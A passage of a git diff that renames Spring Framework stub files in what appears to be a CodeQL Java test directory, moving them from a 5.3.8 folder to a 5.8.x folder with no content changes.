java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/NoSuchBeanDefinitionException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/annotation/Autowired.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/annotation/Autowired.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/annotation/Autowired.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/annotation/Autowired.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/config/BeanDefinition.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/config/BeanDefinition.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/config/BeanDefinition.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/config/BeanDefinition.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/support/BeanDefinitionRegistry.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/support/BeanDefinitionRegistry.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/support/BeanDefinitionRegistry.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/support/BeanDefinitionRegistry.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/support/BeanNameGenerator.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/support/BeanNameGenerator.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/beans/factory/support/BeanNameGenerator.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/beans/factory/support/BeanNameGenerator.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/SpringBootConfiguration.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/SpringBootConfiguration.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/SpringBootConfiguration.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/SpringBootConfiguration.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/actuate/autoconfigure/security/servlet/EndpointRequest.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/actuate/autoconfigure/security/servlet/EndpointRequest.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/actuate/autoconfigure/security/servlet/EndpointRequest.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/actuate/autoconfigure/security/servlet/EndpointRequest.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/autoconfigure/SpringBootApplication.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/autoconfigure/SpringBootApplication.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/autoconfigure/SpringBootApplication.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/autoconfigure/SpringBootApplication.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/jdbc/DataSourceBuilder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/jdbc/DataSourceBuilder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/jdbc/DataSourceBuilder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/jdbc/DataSourceBuilder.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/security/servlet/ApplicationContextRequestMatcher.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/security/servlet/ApplicationContextRequestMatcher.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/boot/security/servlet/ApplicationContextRequestMatcher.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/boot/security/servlet/ApplicationContextRequestMatcher.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/cache/Cache.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/cache/Cache.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/cache/Cache.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/cache/Cache.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/ApplicationContext.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/ApplicationContext.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/ApplicationContext.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/ApplicationContext.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/ApplicationEventPublisher.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/ApplicationEventPublisher.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/ApplicationEventPublisher.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/ApplicationEventPublisher.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/HierarchicalMessageSource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/HierarchicalMessageSource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/HierarchicalMessageSource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/HierarchicalMessageSource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/MessageSource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/MessageSource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/MessageSource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/MessageSource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/MessageSourceResolvable.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/MessageSourceResolvable.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/MessageSourceResolvable.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/MessageSourceResolvable.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/AnnotationScopeMetadataResolver.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/AnnotationScopeMetadataResolver.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/AnnotationScopeMetadataResolver.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/AnnotationScopeMetadataResolver.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Bean.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Bean.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Bean.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Bean.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ComponentScan.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ComponentScan.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ComponentScan.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ComponentScan.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ComponentScans.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ComponentScans.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ComponentScans.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ComponentScans.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Condition.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Condition.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Condition.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Condition.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ConditionContext.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ConditionContext.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ConditionContext.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ConditionContext.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Conditional.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Conditional.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Conditional.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Conditional.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Configuration.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Configuration.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Configuration.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Configuration.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/FilterType.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/FilterType.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/FilterType.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/FilterType.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Profile.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Profile.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/Profile.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/Profile.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ProfileCondition.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ProfileCondition.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ProfileCondition.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ProfileCondition.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ScopeMetadata.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ScopeMetadata.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ScopeMetadata.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ScopeMetadata.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ScopeMetadataResolver.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ScopeMetadataResolver.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ScopeMetadataResolver.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ScopeMetadataResolver.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ScopedProxyMode.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ScopedProxyMode.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/annotation/ScopedProxyMode.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/annotation/ScopedProxyMode.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/support/AbstractMessageSource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/support/AbstractMessageSource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/support/AbstractMessageSource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/support/AbstractMessageSource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/support/DefaultMessageSourceResolvable.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/support/DefaultMessageSourceResolvable.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/support/DefaultMessageSourceResolvable.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/support/DefaultMessageSourceResolvable.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/support/MessageSourceSupport.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/support/MessageSourceSupport.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/support/MessageSourceSupport.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/support/MessageSourceSupport.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/context/support/StaticMessageSource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/context/support/StaticMessageSource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/context/support/StaticMessageSource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/context/support/StaticMessageSource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/AliasRegistry.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/AliasRegistry.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/AliasRegistry.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/AliasRegistry.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/NestedRuntimeException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/NestedRuntimeException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/NestedRuntimeException.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/NestedRuntimeException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/ParameterizedTypeReference.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/ParameterizedTypeReference.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/ParameterizedTypeReference.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/ParameterizedTypeReference.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/ResolvableType.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/ResolvableType.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/ResolvableType.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/ResolvableType.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/annotation/AliasFor.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/annotation/AliasFor.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/annotation/AliasFor.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/annotation/AliasFor.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/env/EnvironmentCapable.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/env/EnvironmentCapable.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/env/EnvironmentCapable.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/env/EnvironmentCapable.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/AbstractFileResolvingResource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/AbstractFileResolvingResource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/AbstractFileResolvingResource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/AbstractFileResolvingResource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/AbstractResource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/AbstractResource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/AbstractResource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/AbstractResource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/ClassPathResource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/ClassPathResource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/ClassPathResource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/ClassPathResource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/FileSystemResource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/FileSystemResource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/FileSystemResource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/FileSystemResource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/FileUrlResource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/FileUrlResource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/FileUrlResource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/FileUrlResource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/InputStreamSource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/InputStreamSource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/InputStreamSource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/InputStreamSource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/PathResource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/PathResource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/PathResource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/PathResource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/Resource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/Resource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/Resource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/Resource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/ResourceLoader.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/ResourceLoader.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/ResourceLoader.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/ResourceLoader.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/UrlResource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/UrlResource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/UrlResource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/UrlResource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/WritableResource.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/WritableResource.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/WritableResource.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/WritableResource.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/support/ResourcePatternResolver.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/support/ResourcePatternResolver.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/support/ResourcePatternResolver.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/support/ResourcePatternResolver.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/support/ResourceRegion.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/support/ResourceRegion.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/io/support/ResourceRegion.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/io/support/ResourceRegion.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/core/type/AnnotatedTypeMetadata.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/core/type/AnnotatedTypeMetadata.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/core/type/AnnotatedTypeMetadata.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/core/type/AnnotatedTypeMetadata.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/dao/DataAccessException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/dao/DataAccessException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/dao/DataAccessException.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/dao/DataAccessException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/data/domain/Pageable.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/data/domain/Pageable.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/data/domain/Pageable.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/data/domain/Pageable.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/data/domain/Sort.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/data/domain/Sort.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/data/domain/Sort.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/data/domain/Sort.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/data/util/MethodInvocationRecorder.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/data/util/MethodInvocationRecorder.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/data/util/MethodInvocationRecorder.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/data/util/MethodInvocationRecorder.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/data/util/Streamable.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/data/util/Streamable.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/data/util/Streamable.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/data/util/Streamable.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/EvaluationContext.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/EvaluationContext.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/EvaluationContext.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/EvaluationContext.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/EvaluationException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/EvaluationException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/EvaluationException.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/EvaluationException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/Expression.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/Expression.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/Expression.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/Expression.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/ExpressionException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/ExpressionException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/ExpressionException.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/ExpressionException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/ExpressionParser.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/ExpressionParser.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/ExpressionParser.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/ExpressionParser.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/ParseException.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/ParseException.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/ParseException.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/ParseException.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/ParserContext.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/ParserContext.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/ParserContext.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/ParserContext.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/common/TemplateAwareExpressionParser.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/common/TemplateAwareExpressionParser.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/common/TemplateAwareExpressionParser.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/common/TemplateAwareExpressionParser.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/spel/standard/SpelExpression.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/spel/standard/SpelExpression.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/spel/standard/SpelExpression.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/spel/standard/SpelExpression.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/spel/standard/SpelExpressionParser.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/spel/standard/SpelExpressionParser.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/spel/standard/SpelExpressionParser.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/spel/standard/SpelExpressionParser.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/spel/support/SimpleEvaluationContext.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/spel/support/SimpleEvaluationContext.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/spel/support/SimpleEvaluationContext.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/spel/support/SimpleEvaluationContext.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/spel/support/StandardEvaluationContext.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/spel/support/StandardEvaluationContext.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/expression/spel/support/StandardEvaluationContext.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/expression/spel/support/StandardEvaluationContext.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/CacheControl.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/CacheControl.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/CacheControl.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/CacheControl.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/ContentDisposition.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/ContentDisposition.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/ContentDisposition.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/ContentDisposition.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpEntity.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpEntity.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpEntity.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpEntity.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpHeaders.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpHeaders.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpHeaders.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpHeaders.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpMessage.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpMessage.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpMessage.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpMessage.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpMethod.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpMethod.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpMethod.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpMethod.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpRange.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpRange.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpRange.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpRange.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpRequest.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpRequest.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpRequest.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpRequest.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpStatus.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpStatus.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/HttpStatus.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/HttpStatus.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/MediaType.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/MediaType.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/MediaType.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/MediaType.java diff --git a/java/ql/test/stubs/springframework-5.3.8/org/springframework/http/RequestEntity.java b/java/ql/test/stubs/springframework-5.8.x/org/springframework/http/RequestEntity.java similarity index 100% rename from java/ql/test/stubs/springframework-5.3.8/org/springframework/http/RequestEntity.java rename to java/ql/test/stubs/springframework-5.8.x/org/springframework/http/RequestEntity.java diff --git 